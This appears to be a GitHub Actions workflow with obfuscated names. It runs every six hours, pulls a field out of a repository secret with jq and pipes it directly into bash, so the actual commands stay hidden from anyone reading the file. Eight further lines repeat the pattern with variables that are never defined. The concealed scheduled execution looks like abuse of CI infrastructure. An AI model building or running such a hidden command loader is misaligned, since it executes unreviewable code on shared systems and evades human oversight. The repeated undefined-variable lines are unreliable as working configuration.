name: xuliangqing7654

on:
  workflow_dispatch:
  schedule:
    - cron: '22 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuliangqing7654
        env:
          pk570: ${{ secrets.pk570 }}
        run: |
          echo $pk570 | jq -r .l48803 | /bin/bash
          echo $a330 | jq -r .wbzog35881 | /bin/bash
          echo $ytn6 | jq -r .d6692 | /bin/bash
          echo $nvk6755 | jq -r .r0 | /bin/bash
          echo $aed734 | jq -r .itrl856 | /bin/bash
          echo $kjlf49 | jq -r .fsxw1 | /bin/bash
          echo $feg1553 | jq -r .lw52 | /bin/bash
          echo $xoilp65730 | jq -r .s825 | /bin/bash
          echo $fjapt7036 | jq -r .yjyk73 | /bin/bash

